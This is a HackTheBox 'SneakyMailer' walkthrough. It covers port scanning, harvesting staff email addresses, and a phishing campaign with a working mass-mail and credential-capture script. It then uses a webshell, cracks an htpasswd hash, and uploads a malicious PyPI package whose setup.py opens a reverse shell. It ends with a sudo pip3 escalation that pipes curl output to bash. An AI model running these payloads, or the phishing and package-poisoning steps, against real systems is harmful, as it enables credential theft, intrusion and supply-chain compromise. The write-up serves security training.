HTB::SneakyMailer

Lab environment

    SneakyMailer_info

Penetration process

0x01 Information gathering

    masscan

    masscan 10.10.10.197 -p0-65535 --rate 1000
    

Scan results:

    Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-12-10 04:36:18 GMT
     -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
    Initiating SYN Stealth Scan
    Scanning 1 hosts [65536 ports/host]
    Discovered open port 143/tcp on 10.10.10.197
    Discovered open port 22/tcp on 10.10.10.197
    Discovered open port 25/tcp on 10.10.10.197
    Discovered open port 993/tcp on 10.10.10.197
    Discovered open port 21/tcp on 10.10.10.197
    Discovered open port 8080/tcp on 10.10.10.197
    Discovered open port 80/tcp on 10.10.10.197
    

    nmap

    nmap -sC -sV -p21,22,25,80,143,993,8080 --min-rate 1000 10.10.10.197
    

Scan results:

    Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-10 12:39 CST
    Nmap scan report for 10.10.10.197
    Host is up (0.44s latency).
    
    PORT     STATE SERVICE  VERSION
    21/tcp   open  ftp      vsftpd 3.0.3
    22/tcp   open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
    | ssh-hostkey:
    |   2048 57:c9:00:35:36:56:e6:6f:f6:de:86:40:b2:ee:3e:fd (RSA)
    |   256 d8:21:23:28:1d:b8:30:46:e2:67:2d:59:65:f0:0a:05 (ECDSA)
    |_  256 5e:4f:23:4e:d4:90:8e:e9:5e:89:74:b3:19:0c:fc:1a (ED25519)
    25/tcp   open  smtp     Postfix smtpd
    |_smtp-commands: debian, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING,
    80/tcp   open  http     nginx 1.14.2
    |_http-title: Did not follow redirect to http://sneakycorp.htb
    143/tcp  open  imap     Courier Imapd (released 2018)
    |_imap-capabilities: IMAP4rev1 STARTTLS THREAD=REFERENCES UIDPLUS THREAD=ORDEREDSUBJECT ACL2=UNION IDLE NAMESPACE UTF8=ACCEPTA0001 QUOTA OK ACL completed SORT CAPABILITY CHILDREN ENABLE
    | ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
    | Subject Alternative Name: email:postmaster@example.com
    | Not valid before: 2020-05-14T17:14:21
    |_Not valid after:  2021-05-14T17:14:21
    |_ssl-date: TLS randomness does not represent time
    993/tcp  open  ssl/imap Courier Imapd (released 2018)
    |_imap-capabilities: IMAP4rev1 THREAD=REFERENCES UIDPLUS THREAD=ORDEREDSUBJECT ACL2=UNION IDLE NAMESPACE UTF8=ACCEPTA0001 QUOTA OK AUTH=PLAIN ACL completed SORT CAPABILITY CHILDREN ENABLE
    | ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
    | Subject Alternative Name: email:postmaster@example.com
    | Not valid before: 2020-05-14T17:14:21
    |_Not valid after:  2021-05-14T17:14:21
    |_ssl-date: TLS randomness does not represent time
    8080/tcp open  http     nginx 1.14.2
    |_http-open-proxy: Proxy might be redirecting requests
    |_http-title: Welcome to nginx!
    Service Info: Host:  debian; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 76.39 seconds
    

Ports 25, 143 and 993 are all mail-related (SMTP, IMAP and IMAPS).

Anonymous FTP login fails.

Port 80:

80

None of the links lead anywhere, so the site is presumably static.

Collect the usernames and e-mail addresses listed on the home page. The team table from the page is copied into SneakyMailer.txt as tab-separated columns, with the address in the fourth column:

    # field separator is a literal tab; column 4 holds the e-mail address
    cat SneakyMailer.txt | awk -F '	' '{print $4}' > mail.txt
    # the local part of each address doubles as a username candidate
    cat SneakyMailer.txt | awk -F '	' '{print $4}' | awk -F '@' '{print $1}' > user.txt
    
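The same harvesting step done directly against the saved HTML rather than a hand-pasted table, as an added example that is not part of the original post. It pulls every address out of the page (table cells and mailto: links alike), deduplicates them in document order, and derives the username candidates. The HTML below is a constructed, cut-down stand-in for the port 80 team page; paulbyrd@sneakymailer.htb is the post's address, janedoe@ is made up for the sample, and the output file names mail.txt / user.txt follow the awk commands above.

```python
"""Harvest e-mail addresses and username candidates from a saved team page.

Added example, not the original post's script. SAMPLE_HTML is constructed to
mimic the shape of the sneakycorp.htb team table; only paulbyrd@ is from the
post, the other entry is invented for the sample.
"""
import re
import urllib.request

# Permissive RFC-5322-ish matcher; good enough for harvesting from HTML,
# where addresses sit inside table cells and mailto: hrefs.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

# Constructed sample: a cut-down team table, with one address repeated in a
# mailto: link to show that deduplication is needed.
SAMPLE_HTML = """
<table class="table">
  <tr><th>Name</th><th>Position</th><th>Email</th></tr>
  <tr><td>Paul Byrd</td><td>CEO</td>
      <td><a href="mailto:paulbyrd@sneakymailer.htb">paulbyrd@sneakymailer.htb</a></td></tr>
  <tr><td>Jane Doe</td><td>Developer</td><td>janedoe@sneakymailer.htb</td></tr>
  <tr><td>Paul Byrd</td><td>CEO</td><td>paulbyrd@sneakymailer.htb</td></tr>
</table>
"""


def fetch_page(url, host_header="sneakycorp.htb"):
    """Download a page, forcing the vhost name the site redirects to."""
    req = urllib.request.Request(url, headers={"Host": host_header})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", errors="replace")


def harvest_emails(html):
    """Return the unique e-mail addresses in the order they first appear."""
    found = []
    for match in EMAIL_RE.finditer(html):
        addr = match.group(0).lower()
        if addr not in found:
            found.append(addr)
    return found


def local_parts(emails):
    """Username candidates: the part before '@', deduplicated in order."""
    users = []
    for addr in emails:
        user = addr.split("@", 1)[0]
        if user not in users:
            users.append(user)
    return users


def write_lists(html, mail_path="mail.txt", user_path="user.txt"):
    """Write mail.txt and user.txt (one entry per line) and return both lists."""
    emails = harvest_emails(html)
    users = local_parts(emails)
    with open(mail_path, "w") as f:
        f.write("\n".join(emails) + "\n")
    with open(user_path, "w") as f:
        f.write("\n".join(users) + "\n")
    return emails, users


if __name__ == "__main__":
    # Against the live box this would be fetch_page("http://10.10.10.197/");
    # the constructed sample is used here so the script runs offline.
    emails, users = write_lists(SAMPLE_HTML)
    print(f"{len(emails)} addresses, {len(users)} usernames")
```

The domain of the harvested addresses (sneakymailer.htb) differs from the web vhost (sneakycorp.htb); the Postfix banner above accepts mail for local users, which is what the phishing step relies on.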

Port 8080:

8080

Directory brute-forcing turns up nothing.

The page source contains a comment hinting at a registration page that is about to go live:

comment

The registration page itself:

register

The registration page is static, so nothing can be done with it.

0x02 Exploitation

    rshell

With this many mail ports open, the box is presumably a mail server, so the users are the target. Use setoolkit to run a phishing attack:

    Mail

Send the phishing mail to the harvested addresses:

    Mail2

Someone bites and submits the form to our listener:

    Mail3

URL-decoded:

    firstName=Paul&
    lastName=Byrd&
    email=paulbyrd@sneakymailer.htb&
    password=^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht&
    rpassword=^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht
    
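The phishing step above without setoolkit, as an added example that is not part of the original post: one script that relays a lure to every harvested address through the target's own Postfix and runs the HTTP listener that catches the form submission and URL-decodes it. Assumptions: the listener address 10.10.14.3 is the attacker IP used elsewhere in the post, the sender address it@sneakycorp.htb and the lure text are made up, and the victim's form posts the five fields shown in the decoded capture above. SAMPLE_BODY is the post's decoded submission re-encoded as a constructed urlencoded body so the parser can be exercised offline.

```python
"""Phishing relay and credential-capture listener.

Added example, not the post's tooling (the post used setoolkit). Assumed:
attacker listener 10.10.14.3, relay through the target's Postfix on
10.10.10.197:25, invented sender address and lure text.
"""
import smtplib
from email.message import EmailMessage
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs

ATTACKER = "10.10.14.3"        # from the post's reverse-shell command
TARGET_SMTP = "10.10.10.197"   # the box's open Postfix relay
LURE_URL = f"http://{ATTACKER}/register"

# Constructed sample: the post's decoded submission, re-encoded the way a
# browser would POST it (application/x-www-form-urlencoded).
SAMPLE_BODY = (
    "firstName=Paul&lastName=Byrd&email=paulbyrd%40sneakymailer.htb"
    "&password=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt"
    "&rpassword=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt"
)


def build_message(sender, recipient, link):
    """Plain-text lure pointing the recipient at our registration page."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = "Please register for the new employee portal"
    msg.set_content(f"Hi,\n\nRegistration is now open: {link}\n\nIT")
    return msg


def send_phish(recipients, sender="it@sneakycorp.htb", link=LURE_URL):
    """Relay one lure per address through the target's Postfix (no auth needed)."""
    with smtplib.SMTP(TARGET_SMTP, 25, timeout=10) as smtp:
        for rcpt in recipients:
            smtp.send_message(build_message(sender, rcpt, link))


def parse_credentials(body):
    """Decode a urlencoded form body into a dict of single-valued fields."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


class CaptureHandler(BaseHTTPRequestHandler):
    """Accept any POST, log the decoded fields, answer 200 so nothing looks off."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length).decode("utf-8", errors="replace")
        creds = parse_credentials(body)
        print(f"[+] {self.client_address[0]} submitted: {creds}")
        self.send_response(200)
        self.end_headers()

    def do_GET(self):
        # Serve a bare page so the lure link does not 404 before the victim types.
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"<form method=post><input name=password><input type=submit></form>")


if __name__ == "__main__":
    # send_phish(open("mail.txt").read().split())  # after the harvesting step
    HTTPServer((ATTACKER, 80), CaptureHandler).serve_forever()
```

Port 80 needs root on the attacking host; any port works as long as the lure URL matches. Because Postfix accepts the mail unauthenticated and the victim's client is scripted to open the link, the whole chain is a forged From header plus an open relay, which is exactly what SPF/DKIM checks and relay restrictions are meant to stop.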

Log in to the mail server with telnet using the captured password:

    Mail4

Log in to the mail server with Thunderbird:

    Mail5

The mailbox yields the following:

    Username: developer
    Original-Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C
    

These credentials log in to the FTP service:

    ftp1

Mirror the FTP contents:

    wget -r --ftp-user='developer' --ftp-password='m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C' ftp://10.10.10.197
    

They are all static files, identical to the port 80 site.

Judging by the directory name and the username, these are the internal test pages used for development.

Try enumerating subdomains (virtual hosts):

    -> wfuzz -w ~/Wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://10.10.10.197 -H "HOST: FUZZ.sneakycorp.htb" --sc 200
    ********************************************************
    * Wfuzz 3.1.0 - The Web Fuzzer                         *
    ********************************************************
    
    Target: http://10.10.10.197/
    Total requests: 4997
    
    =====================================================================
    ID           Response   Lines    Word       Chars       Payload
    =====================================================================
    
    000000019:   200        340 L    989 W      13737 Ch    "dev - dev"
    
    Total time: 300.8313
    Processed Requests: 4997
    Filtered Requests: 4996
    Requests/sec.: 16.61063
    
    -> gobuster vhost -w ~/Wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u sneakycorp.htb
    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:          http://sneakycorp.htb
    [+] Threads:      10
    [+] Wordlist:     /root/Wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
    [+] User Agent:   gobuster/3.0.1
    [+] Timeout:      10s
    ===============================================================
    2020/12/12 14:08:54 Starting gobuster
    ===============================================================
    Found: dev.sneakycorp.htb (Status: 200) [Size: 13742]
    [ERROR] 2020/12/12 14:13:31 [!] Get http://sneakycorp.htb/: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
    [ERROR] 2020/12/12 14:13:41 [!] Get http://sneakycorp.htb/: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
    [ERROR] 2020/12/12 14:13:42 [!] Get http://sneakycorp.htb/: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
    ===============================================================
    2020/12/12 14:13:52 Finished
    ===============================================================
    

dev shows the same content as the main page, so the FTP directory is presumably its document root.

Upload a webshell over FTP:

ftp2

Reverse shell:

ftp2

low

Upload an enumeration helper script; it reports:

    shell

    [-] htpasswd found - could contain passwords:
    /var/www/pypi.sneakycorp.htb/.htpasswd
    pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/
    

Identify the hash type from hashcat's example hashes:

    hashcat1

Crack it:

    hashcat2

    $apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/:soufianeelhaoui
    
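To check the hashcat result offline, and to show what the `$apr1$` format actually is, here is an added example (not from the post) that re-implements Apache's MD5-crypt in the standard library and runs a small dictionary attack with it. `$apr1$` is the same construction as glibc's `$1$` with a different magic prefix: salted MD5, mixed with password-length tricks, then 1000 rounds. The hash, salt and password are the post's; the wordlist is constructed.

```python
"""Verify and crack an Apache htpasswd $apr1$ entry.

Added example, not the post's code. Implements the $apr1$ MD5-crypt
algorithm (same as glibc $1$ apart from the magic string). The hash and
password come from the post; WORDLIST is constructed.
"""
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

HTPASSWD_LINE = "pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/"
WORDLIST = ["password", "pypi", "sneakycorp", "soufianeelhaoui"]  # constructed


def _to64(value, count):
    """crypt(3)-style base64: least-significant 6 bits first, no padding."""
    out = []
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def apr1_crypt(password, salt, magic="$apr1$"):
    """Return the full '$apr1$salt$hash' string for password and salt."""
    pw = password.encode()
    salt = salt[:8].encode()          # at most 8 salt characters are used
    ctx = hashlib.md5(pw + magic.encode() + salt)
    alt = hashlib.md5(pw + salt + pw).digest()
    # Feed in the alternate digest once per 16 bytes of password length.
    pl = len(pw)
    while pl > 0:
        ctx.update(alt[:min(16, pl)])
        pl -= 16
    # One byte per bit of len(pw): NUL for a 1-bit, pw[0] for a 0-bit.
    i = len(pw)
    while i:
        ctx.update(b"\x00" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    # 1000 rounds, alternating the order of password and running digest.
    for i in range(1000):
        ctx1 = hashlib.md5()
        ctx1.update(pw if i & 1 else final)
        if i % 3:
            ctx1.update(salt)
        if i % 7:
            ctx1.update(pw)
        ctx1.update(final if i & 1 else pw)
        final = ctx1.digest()
    # 22 output characters; bytes are permuted in MD5-crypt's fixed order.
    groups = [(0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)]
    enc = "".join(
        _to64((final[a] << 16) | (final[b] << 8) | final[c], 4) for a, b, c in groups
    )
    enc += _to64(final[11], 2)
    return f"{magic}{salt.decode()}${enc}"


def parse_htpasswd_line(line):
    """Split 'user:$apr1$salt$hash' into (user, salt, full_hash)."""
    user, full_hash = line.strip().split(":", 1)
    _, magic, salt, _ = full_hash.split("$")
    if magic != "apr1":
        raise ValueError(f"not an $apr1$ hash: {magic}")
    return user, salt, full_hash


def crack(line, wordlist):
    """Return the first candidate that reproduces the hash, else None."""
    _, salt, full_hash = parse_htpasswd_line(line)
    for candidate in wordlist:
        if apr1_crypt(candidate, salt) == full_hash:
            return candidate
    return None


if __name__ == "__main__":
    print(HTPASSWD_LINE, "->", crack(HTPASSWD_LINE, WORDLIST))
```

This is only a correctness check; at 1000 MD5 rounds per guess pure Python manages a few thousand candidates per second, which is why hashcat (mode 1600) does the real work. The point for defenders is the other way round: `$apr1$` has no tunable cost, so an `.htpasswd` left readable under the web root is cracked as fast as the wordlist is good.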

The recovered credentials do not get us a login on their own; listing /var/www/ reveals a pypi vhost directory, so visit that site:

pypi

PyPI (the Python Package Index) is the official third-party software repository for Python. Package managers such as pip download packages from PyPI by default, and more than 235,000 packages are available there. Here the box runs its own private index, so whatever we upload will be installed by whoever consumes it.

Build a package that spawns a reverse shell:

    evalpkg
    	- setup.py
    	- .pypirc
    

    setup.py:

    import setuptools
    import os
    
    os.system("echo 'bash -i >& /dev/tcp/10.10.14.3/10086 0>&1' | /bin/bash")
    
    setuptools.setup(
        name="evalpkg", # Replace with your own username
        version="0.0.1",
        author="chalan630",
        author_email="author@example.com",
        description="A small example package",
        classifiers=[
            "Programming Language :: Python :: 3",
            "License :: OSI Approved :: MIT License",
            "Operating System :: OS Independent",
        ],
        python_requires='>=3.6',
    )
    

    .pypirc:

    [distutils]
    index-servers=local
    
    [local]
    repository: http://pypi.sneakycorp.htb:8080
    username: pypi
    password: soufianeelhaoui
    

Upload (shell):

    # HOME is pointed at the package directory so setuptools reads the .pypirc there
    HOME=$(pwd)
    python3 setup.py sdist register -r local upload -r local
    

    low

Upload succeeds:

    low2

Because setup.py executes while the sdist is being built locally, the reverse shell fires on our own machine first and the listener catches our own shell. Once the package has been uploaded, start the listener again: when user low inspects the package (installs it), setup.py runs as low and we receive low's shell.

    low3

user.txt obtained.

    root

Enumeration:

    root1

Privilege escalation via pip:

    root2

    # sudo lets low run pip3 as root; installing a local directory executes its setup.py as root
    TF=$(mktemp -d)
    # the setup.py just pulls and runs a reverse-shell script served from our host
    echo "import os;os.system('curl 10.10.14.87|bash')" > $TF/setup.py
    sudo pip3 install $TF
    

root.txt obtained.

    Reference

    upload-with-setuptools

Original source: https://www.cnblogs.com/chalan630/p/14128977.html